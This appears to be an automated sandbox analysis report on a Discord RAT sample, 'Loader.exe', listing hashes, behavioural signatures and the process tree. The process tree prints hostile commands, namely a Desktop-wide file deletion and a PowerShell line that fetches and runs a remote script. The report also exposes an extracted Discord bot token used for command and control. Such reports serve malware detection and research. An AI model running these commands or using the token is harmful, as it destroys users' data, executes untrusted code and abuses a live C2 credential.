Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 20:23
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win10v2004-20241007-en
General
-
Target
Loader.exe
-
Size
92KB
-
MD5
1301b9ea64d8390d9970ca0525b10154
-
SHA1
0c06706061f6457871f5e88aff1a12cfcc2960be
-
SHA256
0f070514a21f205c7d933c888e2adfd9b9a88ee974bc5df6542e2e281c2876f1
-
SHA512
b83033cb2195f38105cf16fa8ff6967415b68fd01b5925e71ad43e5b1b72815f164f8e9c82e52d1bb727073e61c2d3b46cd4969dd893835f5cde6883ed31cf57
-
SSDEEP
1536:SbPuJtGN8F+9okEPBAqcBPDyc5I0bpAkAfLgbGNrb9xCIpOMeG73:UuJkN8FwokzBBPDyc5RQgbGNrUGD
Malware Config
Extracted
discordrat
-
discord_token
MTEyODc1NDE4NjI0MzI5NzMwMg.G7x4DL.C_NV-XSCLkwRQbJ-r5Quy0tggrU3wc8H7rWdS4
-
server_id
1316838123023630386
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 28 IoCs
flow ioc 74 discord.com 78 discord.com 75 discord.com 17 discord.com 18 discord.com 53 discord.com 61 discord.com 63 discord.com 73 discord.com 52 discord.com 54 discord.com 60 discord.com 79 discord.com 22 discord.com 29 discord.com 51 discord.com 70 discord.com 76 discord.com 77 discord.com 62 discord.com 69 discord.com 31 discord.com 48 discord.com 55 discord.com 56 discord.com 59 discord.com 64 discord.com 72 discord.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpDE69.tmp.png" Loader.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 848 Loader.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 848 wrote to memory of 3136 848 Loader.exe 99 PID 848 wrote to memory of 3136 848 Loader.exe 99 PID 3136 wrote to memory of 4468 3136 cmd.exe 101 PID 3136 wrote to memory of 4468 3136 cmd.exe 101 PID 848 wrote to memory of 2864 848 Loader.exe 102 PID 848 wrote to memory of 2864 848 Loader.exe 102 PID 848 wrote to memory of 1180 848 Loader.exe 104 PID 848 wrote to memory of 1180 848 Loader.exe 104 PID 848 wrote to memory of 2008 848 Loader.exe 107 PID 848 wrote to memory of 2008 848 Loader.exe 107 PID 848 wrote to memory of 4936 848 Loader.exe 110 PID 848 wrote to memory of 4936 848 Loader.exe 110 PID 848 wrote to memory of 4980 848 Loader.exe 113 PID 848 wrote to memory of 4980 848 Loader.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C msg * olá raphael2⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\system32\msg.exemsg * olá raphael3⤵PID:4468
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C del "%USERPROFILE%\Desktop\image*.png"2⤵PID:2864
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C echo. > "%USERPROFILE%\Desktop\image.png"2⤵PID:1180
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C echo. > "%USERPROFILE%\Desktop\image1.png"2⤵PID:2008
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C del /q "%USERPROFILE%\Desktop\*.*"2⤵PID:4936
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C irm https://massgrave.dev/get | iex2⤵PID:4980
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3B
MD5bc949ea893a9384070c31f083ccefd26
SHA1cbb8391cb65c20e2c05a2f29211e55c49939c3db
SHA2566bdf66b5bf2a44e658bea2ee86695ab150a06e600bf67cd5cce245ad54962c61
SHA512e4288e71070485637ec5825f510a7daa7e75ef6c71a1b755f51e1b0f2e58e5066837f58408ea74d75db42c49372c6027d433a869904fc5efaf4876dfcfde1287